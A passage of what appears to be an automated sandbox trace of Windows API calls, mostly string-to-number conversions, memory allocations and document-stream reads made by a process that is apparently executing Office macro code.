(_Str="380") returned 380 [0059.283] atoi (_Str="371") returned 371 [0059.284] VarR8FromStr (in: strIn="43755.19020539", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.284] VarR4FromR8 (in: dblIn=0x16299d32, pfltOut=0x40e55d66 | out: pfltOut=0x40e55d66) returned 0x0 [0059.284] atoi (_Str="4991") returned 4991 [0059.284] atoi (_Str="217") returned 217 [0059.284] atoi (_Str="171") returned 171 [0059.285] atoi (_Str="1673") returned 1673 [0059.285] atoi (_Str="1690") returned 1690 [0059.285] atoi (_Str="380") returned 380 [0059.285] atoi (_Str="371") returned 371 [0059.286] VarI4FromStr (in: strIn="32637", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.286] atoi (_Str="473") returned 473 [0059.286] atoi (_Str="380") returned 380 [0059.286] atoi (_Str="371") returned 371 [0059.289] atoi (_Str="4991") returned 4991 [0059.289] atoi (_Str="217") returned 217 [0059.289] VarR8FromStr (in: strIn="45508.848308535", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.289] VarR4FromR8 (in: dblIn=0x2557f0d8, pfltOut=0x40e6389b | out: pfltOut=0x40e6389b) returned 0x0 [0059.290] atoi (_Str="482") returned 482 [0059.290] atoi (_Str="433") returned 433 [0059.290] VarI4FromStr (in: strIn="32637", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.290] atoi (_Str="473") returned 473 [0059.291] atoi (_Str="380") returned 380 [0059.291] atoi (_Str="371") returned 371 [0059.291] atoi (_Str="2021") returned 2021 [0059.292] CExposedStream::Read () returned 0x0 [0059.292] CRetailMalloc_Realloc () returned 0x887f4f0 [0059.292] CExposedStream::Release () returned 0x1 [0059.292] CExposedStream::Release () returned 0x0 [0059.294] CRetailMalloc_Realloc () returned 0x87fc0e0 [0059.294] CRetailMalloc_Alloc () returned 0x88420c8 [0059.294] CRetailMalloc_Alloc () returned 0x6178ef0 [0059.294] CRetailMalloc_Alloc () returned 0x867b668 [0059.295] CRetailMalloc_Realloc () returned 0x76b48d8 [0059.295] CRetailMalloc_Realloc () returned 0x87aa140 [0059.295] CRetailMalloc_Realloc () returned 0x8750160 [0059.295] CRetailMalloc_Alloc () returned 0x8769710 [0059.295] CRetailMalloc_Free () returned 0x1670001 [0059.296] CRetailMalloc_Alloc () returned 0x88111e0 [0059.296] CRetailMalloc_Realloc () returned 0x883b4c0 [0059.296] CRetailMalloc_Free () returned 0x24b0001 [0059.296] CRetailMalloc_Alloc () returned 0x88816c8 [0059.296] CRetailMalloc_Alloc () returned 0x88111e0 [0059.296] CRetailMalloc_Alloc () returned 0x87fc260 [0059.296] CRetailMalloc_Alloc () returned 0x87eb968 [0059.296] CRetailMalloc_Alloc () returned 0x86e5f98 [0059.296] CRetailMalloc_Alloc () returned 0x86e6038 [0059.299] CRetailMalloc_Alloc () returned 0x876cb38 [0059.299] CRetailMalloc_Free () returned 0x1c0001 [0059.299] CExposedDocFile::AddRef () returned 0x5 [0059.299] CExposedDocFile::OpenStream () returned 0x0 [0059.299] CExposedDocFile::Release () returned 0x5 [0059.299] CExposedStream::Seek () returned 0x0 [0059.299] CRetailMalloc_Alloc () returned 0x8881938 [0059.299] CRetailMalloc_Alloc () returned 0x87eba78 [0059.300] CRetailMalloc_Alloc () returned 0x8881f58 [0059.300] CRetailMalloc_Alloc () returned 0x8811078 [0059.300] CRetailMalloc_Alloc () returned 0x86e6028 [0059.300] CRetailMalloc_Alloc () returned 0x86e6018 [0059.300] CRetailMalloc_Alloc () returned 0x8811000 [0059.300] CRetailMalloc_Alloc () returned 0x87ebb88 [0059.300] CExposedStream::AddRef () returned 0x2 [0059.300] CExposedStream::Read () returned 0x0 [0059.300] CExposedStream::AddRef () returned 0x3 [0059.300] CExposedStream::Release () returned 0x2 [0059.300] CRetailMalloc_Alloc () returned 0x88863e0 [0059.302] CExposedStream::Read () returned 0x0 [0059.302] CExposedStream::Read () returned 0x0 [0059.302] CRetailMalloc_Alloc () returned 0x86e5fe8 [0059.302] CRetailMalloc_Alloc () returned 0x87fc1e8 [0059.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x86e5fe8, cbMultiByte=7, lpWideCharStr=0x87fc1e8, cchWideChar=7 | out: lpWideCharStr="gR4WCf") returned 7 [0059.302] CRetailMalloc_Free () returned 0x3a60201 [0059.303] CRetailMalloc_Free () returned 0x6800301 [0059.303] VarI4FromStr (in: strIn="16711591", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.303] atoi (_Str="89") returned 89 [0059.306] VarI4FromStr (in: strIn="284816640", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.306] atoi (_Str="4363") returned 4363 [0059.306] atoi (_Str="185") returned 185 [0059.306] atoi (_Str="70") returned 70 [0059.307] VarI4FromStr (in: strIn="262284", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.307] atoi (_Str="140") returned 140 [0059.307] atoi (_Str="4089") returned 4089 [0059.307] atoi (_Str="7") returned 7 [0059.307] atoi (_Str="187") returned 187 [0059.308] atoi (_Str="123") returned 123 [0059.308] CRetailMalloc_Realloc () returned 0x779d1d8 [0059.308] CRetailMalloc_Realloc () returned 0x884b518 [0059.308] atoi (_Str="333") returned 333 [0059.308] atoi (_Str="77") returned 77 [0059.309] VarI4FromStr (in: strIn="36241408", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.309] atoi (_Str="553") returned 553 [0059.310] CRetailMalloc_Realloc () returned 0x87161d8 [0059.311] atoi (_Str="255") returned 255 [0059.311] atoi (_Str="63") returned 63 [0059.311] atoi (_Str="63") returned 63 [0059.312] CRetailMalloc_Realloc () returned 0x6210680 [0059.312] atoi (_Str="63") returned 63 [0059.313] CRetailMalloc_Realloc () returned 0x87161d8 [0059.314] VarI4FromStr (in: strIn="28422", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.314] atoi (_Str="1579") returned 1579 [0059.314] atoi (_Str="7432") returned 7432 [0059.314] atoi (_Str="1858") returned 1858 [0059.314] VarR8FromStr (in: strIn="28693.251717584", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.314] VarR4FromR8 (in: dblIn=0x1c2411c7, pfltOut=0x40dc0550 | out: pfltOut=0x40dc0550) returned 0x0 [0059.315] atoi (_Str="353") returned 353 [0059.315] atoi (_Str="383") returned 383 [0059.315] atoi (_Str="8") returned 8 [0059.315] atoi (_Str="206") returned 206 [0059.315] atoi (_Str="144") returned 144 [0059.315] VarI4FromStr (in: strIn="28860", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.315] VarI4FromStr (in: strIn="28422", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.316] atoi (_Str="1579") returned 1579 [0059.318] atoi (_Str="7432") returned 7432 [0059.318] atoi (_Str="1858") returned 1858 [0059.318] VarI4FromStr (in: strIn="134616202", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.318] atoi (_Str="353") returned 353 [0059.318] atoi (_Str="383") returned 383 [0059.318] atoi (_Str="58") returned 58 [0059.319] atoi (_Str="206") returned 206 [0059.319] atoi (_Str="144") returned 144 [0059.319] CRetailMalloc_Realloc () returned 0x6210a88 [0059.319] VarI4FromStr (in: strIn="134616202", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.319] VarI4FromStr (in: strIn="28422", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.319] atoi (_Str="1579") returned 1579 [0059.320] atoi (_Str="7432") returned 7432 [0059.320] atoi (_Str="1858") returned 1858 [0059.320] VarI4FromStr (in: strIn="27145", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.320] atoi (_Str="445") returned 445 [0059.320] VarI4FromStr (in: strIn="13414", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.321] VarI4FromStr (in: strIn="13415", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.321] VarR8FromStr (in: strIn="9767.0175976328", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.321] VarR4FromR8 (in: dblIn=0x40a3a4ae, pfltOut=0x40c31382 | out: pfltOut=0x40c31382) returned 0x0 [0059.321] VarI4FromStr (in: strIn="23424", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.321] atoi (_Str="1464") returned 1464 [0059.321] atoi (_Str="734") returned 734 [0059.322] atoi (_Str="776") returned 776 [0059.322] atoi (_Str="249") returned 249 [0059.322] atoi (_Str="29") returned 29 [0059.322] VarI4FromStr (in: strIn="13414", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.323] VarI4FromStr (in: strIn="13415", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.323] VarR8FromStr (in: strIn="32762.298076228", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.323] VarR4FromR8 (in: dblIn=0x13ae50be, pfltOut=0x40dffe93 | out: pfltOut=0x40dffe93) returned 0x0 [0059.323] VarI4FromStr (in: strIn="27145", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.323] atoi (_Str="445") returned 445 [0059.324] VarI4FromStr (in: strIn="13414", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.324] VarI4FromStr (in: strIn="13415", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.324] VarR8FromStr (in: strIn="45562.336721107", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.324] VarR4FromR8 (in: dblIn=0xc66b57ce, pfltOut=0x40e63f4a | out: pfltOut=0x40e63f4a) returned 0x0 [0059.324] VarI4FromStr (in: strIn="23424", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.325] atoi (_Str="1464") returned 1464 [0059.325] CRetailMalloc_Realloc () returned 0x8804510 [0059.327] VarR8FromStr (in: strIn="45562.336721107", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.327] VarR4FromR8 (in: dblIn=0xc66b57ce, pfltOut=0x40e63f4a | out: pfltOut=0x40e63f4a) returned 0x0 [0059.327] atoi (_Str="734") returned 734 [0059.327] atoi (_Str="776") returned 776 [0059.327] atoi (_Str="51") returned 51 [0059.327] VarR8FromStr (in: strIn="45562.336721107", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.327] VarR4FromR8 (in: dblIn=0xc66b57ce, pfltOut=0x40e63f4a | out: pfltOut=0x40e63f4a) returned 0x0 [0059.328] atoi (_Str="249") returned 249 [0059.328] atoi (_Str="29") returned 29 [0059.328] VarI4FromStr (in: strIn="13414", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.328] VarI4FromStr (in: strIn="13415", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.328] VarI4FromStr (in: strIn="2131246292", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.328] VarI4FromStr (in: strIn="23424", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.328] atoi (_Str="1464") returned 1464 [0059.329] CRetailMalloc_Realloc () returned 0x76fc6a8 [0059.329] VarR8FromStr (in: strIn="59312.232846222", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.329] VarR4FromR8 (in: dblIn=0x7379eb90, pfltOut=0x40ecf607 | out: pfltOut=0x40ecf607) returned 0x0 [0059.329] VarI4FromStr (in: strIn="31349", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.330] VarI4FromStr (in: strIn="27145", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.330] atoi (_Str="445") returned 445 [0059.330] VarI4FromStr (in: strIn="13414", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.330] VarI4FromStr (in: strIn="13415", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.331] VarI4FromStr (in: strIn="23424", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.331] atoi (_Str="1464") returned 1464 [0059.331] atoi (_Str="167") returned 167 [0059.331] atoi (_Str="734") returned 734 [0059.331] atoi (_Str="776") returned 776 [0059.331] VarI4FromStr (in: strIn="21568", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.331] atoi (_Str="64") returned 64 [0059.332] atoi (_Str="1682") returned 1682 [0059.332] atoi (_Str="1696") returned 1696 [0059.332] VarR8FromStr (in: strIn="62987.918283606", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.332] VarR4FromR8 (in: dblIn=0x62944d07, pfltOut=0x40eec17d | out: pfltOut=0x40eec17d) returned 0x0 [0059.332] atoi (_Str="59") returned 59 [0059.332] atoi (_Str="182") returned 182 [0059.333] atoi (_Str="1682") returned 1682 [0059.333] atoi (_Str="1696") returned 1696 [0059.333] VarI4FromStr (in: strIn="21774", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.333] atoi (_Str="8091") returned 8091 [0059.333] atoi (_Str="279") returned 279 [0059.333] VarI4FromStr (in: strIn="1136723522", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.334] VarI4FromStr (in: strIn="24066", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.334] atoi (_Str="382") returned 382 [0059.334] VarR8FromStr (in: strIn="492.7479724569", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.334] VarR4FromR8 (in: dblIn=0xb1f78b1c, pfltOut=0x407ecbf7 | out: pfltOut=0x407ecbf7) returned 0x0 [0059.334] VarI4FromStr (in: strIn="21568", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.334] atoi (_Str="64") returned 64 [0059.334] atoi (_Str="1682") returned 1682 [0059.334] atoi (_Str="1696") returned 1696 [0059.335] atoi (_Str="11") returned 11 [0059.335] atoi (_Str="8091") returned 8091 [0059.335] atoi (_Str="279") returned 279 [0059.335] VarR8FromStr (in: strIn="35104.681556528", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.335] VarR4FromR8 (in: dblIn=0xcf4fa2c4, pfltOut=0x40e12415 | out: pfltOut=0x40e12415) returned 0x0 [0059.335] VarI4FromStr (in: strIn="17963", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.336] VarI4FromStr (in: strIn="21568", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.336] atoi (_Str="64") returned 64 [0059.336] atoi (_Str="1682") returned 1682 [0059.336] atoi (_Str="1696") returned 1696 [0059.336] VarR8FromStr (in: strIn="57078.154692559", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.336] VarR4FromR8 (in: dblIn=0xf33dcf3b, pfltOut=0x40ebdec4 | out: pfltOut=0x40ebdec4) returned 0x0 [0059.337] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="zJrOXe" | out: _Dst="zJrOXe") returned 0x0 [0059.337] VarI4FromStr (in: strIn="30208", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.337] atoi (_Str="59") returned 59 [0059.337] VarI4FromStr (in: strIn="13299", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.338] atoi (_Str="1023") returned 1023 [0059.338] VarR8FromStr (in: strIn="17983.074093215", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.338] VarR4FromR8 (in: dblIn=0xbdf177d2, pfltOut=0x40d18fc4 | out: pfltOut=0x40d18fc4) returned 0x0 [0059.338] VarI4FromStr (in: strIn="23667", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.338] atoi (_Str="1127") returned 1127 [0059.338] VarR8FromStr (in: strIn="17983.074093215", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.338] VarR4FromR8 (in: dblIn=0xbdf177d2, pfltOut=0x40d18fc4 | out: pfltOut=0x40d18fc4) returned 0x0 [0059.339] atoi (_Str="750") returned 750 [0059.339] atoi (_Str="759") returned 759 [0059.339] VarI4FromStr (in: strIn="13299", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.339] atoi (_Str="1023") returned 1023 [0059.339] VarI4FromStr (in: strIn="31135", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.339] atoi (_Str="750") returned 750 [0059.339] atoi (_Str="759") returned 759 [0059.339] VarI4FromStr (in: strIn="13299", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.339] atoi (_Str="1023") returned 1023 [0059.339] atoi (_Str="130") returned 130 [0059.339] VarI4FromStr (in: strIn="23667", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.339] atoi (_Str="1127") returned 1127 [0059.340] VarR8FromStr (in: strIn="18105.831989021", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.340] VarR4FromR8 (in: dblIn=0x3f4ee0f5, pfltOut=0x40d1ae75 | out: pfltOut=0x40d1ae75) returned 0x0 [0059.340] atoi (_Str="270") returned 270 [0059.340] atoi (_Str="307") returned 307 [0059.340] VarR8FromStr (in: strIn="18105.831989021", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.340] VarR4FromR8 (in: dblIn=0x3f4ee0f5, pfltOut=0x40d1ae75 | out: pfltOut=0x40d1ae75) returned 0x0 [0059.340] VarI4FromStr (in: strIn="30208", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.340] atoi (_Str="59") returned 59 [0059.340] VarI4FromStr (in: strIn="13299", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.340] atoi (_Str="1023") returned 1023 [0059.340] VarR8FromStr (in: strIn="6745.8957984881", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.341] VarR4FromR8 (in: dblIn=0x530cba32, pfltOut=0x40ba59e5 | out: pfltOut=0x40ba59e5) returned 0x0 [0059.341] CRetailMalloc_Realloc () returned 0x7426110 [0059.341] VarI4FromStr (in: strIn="23667", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.341] atoi (_Str="1127") returned 1127 [0059.341] atoi (_Str="9711") returned 9711 [0059.341] atoi (_Str="1079") returned 1079 [0059.341] atoi (_Str="3458") returned 3458 [0059.341] atoi (_Str="3467") returned 3467 [0059.341] VarR8FromStr (in: strIn="43599.781958518", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.341] VarR4FromR8 (in: dblIn=0x5cddeb4, pfltOut=0x40e549f9 | out: pfltOut=0x40e549f9) returned 0x0 [0059.341] atoi (_Str="316") returned 316 [0059.342] atoi (_Str="75") returned 75 [0059.342] atoi (_Str="3458") returned 3458 [0059.342] atoi (_Str="3467") returned 3467 [0059.342] VarR8FromStr (in: strIn="17629.385297171", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.342] VarR4FromR8 (in: dblIn=0xa8b5772c, pfltOut=0x40d13758 | out: pfltOut=0x40d13758) returned 0x0 [0059.342] VarR8FromStr (in: strIn="38774.563279823", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.342] VarR4FromR8 (in: dblIn=0x6636849, pfltOut=0x40e2eed2 | out: pfltOut=0x40e2eed2) returned 0x0 [0059.342] atoi (_Str="316") returned 316 [0059.342] atoi (_Str="75") returned 75 [0059.342] atoi (_Str="3458") returned 3458 [0059.342] atoi (_Str="3467") returned 3467 [0059.342] atoi (_Str="0") returned 0 [0059.342] atoi (_Str="105") returned 105 [0059.343] atoi (_Str="9711") returned 9711 [0059.343] atoi (_Str="1079") returned 1079 [0059.343] atoi (_Str="3458") returned 3458 [0059.343] atoi (_Str="3467") returned 3467 [0059.343] VarR8FromStr (in: strIn="10550.059991804", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.343] VarR4FromR8 (in: dblIn=0xadcfba1b, pfltOut=0x40c49b07 | out: pfltOut=0x40c49b07) returned 0x0 [0059.343] atoi (_Str="1040") returned 1040 [0059.343] atoi (_Str="1069") returned 1069 [0059.343] atoi (_Str="223") returned 223 [0059.343] atoi (_Str="491") returned 491 [0059.343] atoi (_Str="524") returned 524 [0059.343] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="zJrOXe" | out: _Dst="zJrOXe") returned 0x0 [0059.343] atoi (_Str="3490") returned 3490 [0059.344] atoi (_Str="3496") returned 3496 [0059.344] atoi (_Str="7839") returned 7839 [0059.344] atoi (_Str="7836") returned 7836 [0059.344] VarR8FromStr (in: strIn="10221.212797358", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.344] VarR4FromR8 (in: dblIn=0x3cf19ea5, pfltOut=0x40c3f69b | out: pfltOut=0x40c3f69b) returned 0x0 [0059.344] atoi (_Str="533") returned 533 [0059.344] atoi (_Str="6") returned 6 [0059.344] atoi (_Str="7839") returned 7839 [0059.344] atoi (_Str="7836") returned 7836 [0059.344] atoi (_Str="165") returned 165 [0059.344] atoi (_Str="290") returned 290 [0059.344] atoi (_Str="312") returned 312 [0059.344] CExposedStream::Read () returned 0x0 [0059.344] CExposedStream::Read () returned 0x0 [0059.345] atoi (_Str="0") returned 0 [0059.345] atoi (_Str="3490") returned 3490 [0059.345] atoi (_Str="3496") returned 3496 [0059.345] atoi (_Str="7839") returned 7839 [0059.346] atoi (_Str="7836") returned 7836 [0059.346] atoi (_Str="94") returned 94 [0059.348] atoi (_Str="3490") returned 3490 [0059.348] atoi (_Str="3496") returned 3496 [0059.348] atoi (_Str="7839") returned 7839 [0059.348] atoi (_Str="7836") returned 7836 [0059.349] atoi (_Str="91") returned 91 [0059.349] atoi (_Str="203") returned 203 [0059.349] atoi (_Str="2314") returned 2314 [0059.349] atoi (_Str="2300") returned 2300 [0059.349] atoi (_Str="1063") returned 1063 [0059.349] atoi (_Str="1037") returned 1037 [0059.349] VarR8FromStr (in: strIn="49505.336232577", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.349] VarR4FromR8 (in: dblIn=0xc26ad242, pfltOut=0x40e82c2a | out: pfltOut=0x40e82c2a) returned 0x0 [0059.350] atoi (_Str="5") returned 5 [0059.350] atoi (_Str="69") returned 69 [0059.350] VarR8FromStr (in: strIn="49505.336232577", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.350] VarR4FromR8 (in: dblIn=0xc26ad242, pfltOut=0x40e82c2a | out: pfltOut=0x40e82c2a) returned 0x0 [0059.350] VarR8FromStr (in: strIn="5023.7010832878", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.350] VarR4FromR8 (in: dblIn=0x7a31c0e0, pfltOut=0x40b39fb3 | out: pfltOut=0x40b39fb3) returned 0x0 [0059.350] atoi (_Str="190") returned 190 [0059.351] atoi (_Str="46") returned 46 [0059.351] atoi (_Str="2314") returned 2314 [0059.351] atoi (_Str="2300") returned 2300 [0059.351] VarI4FromStr (in: strIn="15008", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.351] atoi (_Str="190") returned 190 [0059.351] atoi (_Str="46") returned 46 [0059.352] atoi (_Str="2314") returned 2314 [0059.352] atoi (_Str="2300") returned 2300 [0059.352] VarR8FromStr (in: strIn="1149.315700043", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.352] VarR4FromR8 (in: dblIn=0x46df4020, pfltOut=0x4091f543 | out: pfltOut=0x4091f543) returned 0x0 [0059.352] atoi (_Str="91") returned 91 [0059.352] atoi (_Str="203") returned 203 [0059.353] atoi (_Str="2314") returned 2314 [0059.353] atoi (_Str="2300") returned 2300 [0059.353] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="sUe8PVwTy", cchCount1=-1, lpString2="ivI9N", cchCount2=-1) returned 3 [0059.353] VarR8FromStr (in: strIn="37389.806936803", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.353] VarR4FromR8 (in: dblIn=0xd26d215a, pfltOut=0x40e241b9 | out: pfltOut=0x40e241b9) returned 0x0 [0059.353] atoi (_Str="1063") returned 1063 [0059.353] atoi (_Str="1037") returned 1037 [0059.353] VarR8FromStr (in: strIn="37389.806936803", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.353] VarR4FromR8 (in: dblIn=0xd26d215a, pfltOut=0x40e241b9 | out: pfltOut=0x40e241b9) returned 0x0 [0059.354] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="EwqPK5Nx" | out: _Dst="EwqPK5Nx") returned 0x0 [0059.354] atoi (_Str="4") returned 4 [0059.354] atoi (_Str="600") returned 600 [0059.354] atoi (_Str="42") returned 42 [0059.354] atoi (_Str="466") returned 466 [0059.354] atoi (_Str="474") returned 474 [0059.354] atoi (_Str="247") returned 247 [0059.355] VarR8FromStr (in: strIn="5069.1757324255", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.355] VarR4FromR8 (in: dblIn=0xfcccdc5f, pfltOut=0x40b3cd2c | out: pfltOut=0x40b3cd2c) returned 0x0 [0059.355] atoi (_Str="600") returned 600 [0059.355] atoi (_Str="42") returned 42 [0059.355] atoi (_Str="466") returned 466 [0059.355] atoi (_Str="474") returned 474 [0059.356] VarR8FromStr (in: strIn="1709.5613474211", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.356] VarR4FromR8 (in: dblIn=0xd1dbbd46, pfltOut=0x409ab63e | out: pfltOut=0x409ab63e) returned 0x0 [0059.357] VarI4FromStr (in: strIn="1721949488", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.358] atoi (_Str="600") returned 600 [0059.358] atoi (_Str="42") returned 42 [0059.358] atoi (_Str="466") returned 466 [0059.358] atoi (_Str="474") returned 474 [0059.358] VarR8FromStr (in: strIn="26974.788085689", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.358] VarR4FromR8 (in: dblIn=0x6ffef52d, pfltOut=0x40da57b2 | out: pfltOut=0x40da57b2) returned 0x0 [0059.359] atoi (_Str="600") returned 600 [0059.359] atoi (_Str="42") returned 42 [0059.359] atoi (_Str="466") returned 466 [0059.359] 